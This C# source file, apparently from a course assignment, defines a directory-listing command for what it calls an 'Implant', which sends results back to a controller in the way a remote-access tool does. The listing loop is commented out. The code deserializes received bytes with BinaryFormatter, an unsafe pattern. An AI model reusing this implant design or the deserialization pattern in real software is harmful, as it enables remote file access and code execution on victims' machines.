using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Windows.Forms;
using assignmentObjects;
namespace assignmentObjects
{
    [Serializable]
    public class ListDirectoryCommand:Command
    {
        TreeNode theDirectory =  new TreeNode();
        String thePath;

        public ListDirectoryCommand(string path)
        {
            thePath = path;
        }

        public override void execute()
        {
            theDirectory = new TreeNode();
            DirectoryInfo directoryInfo = new DirectoryInfo(thePath);
            DirectoryInfo[] theDirectories = directoryInfo.GetDirectories();
            foreach (DirectoryInfo directory in theDirectories)
            {
                //theDirectory.Nodes.Add(directory);
            }
            Implant theImplant = Implant.instance();
            theImplant.sendReply(new ListDirectoryReply(theDirectory));
        }

        public override Command DeSerialize(byte[] theData)
        {
            BinaryFormatter bin = new BinaryFormatter();
            MemoryStream mem = new MemoryStream();
            mem.Write(theData, 0, theData.Length);
            mem.Seek(0, 0);
            return (ListDirectoryCommand)bin.Deserialize(mem);
        }
    }

     
}
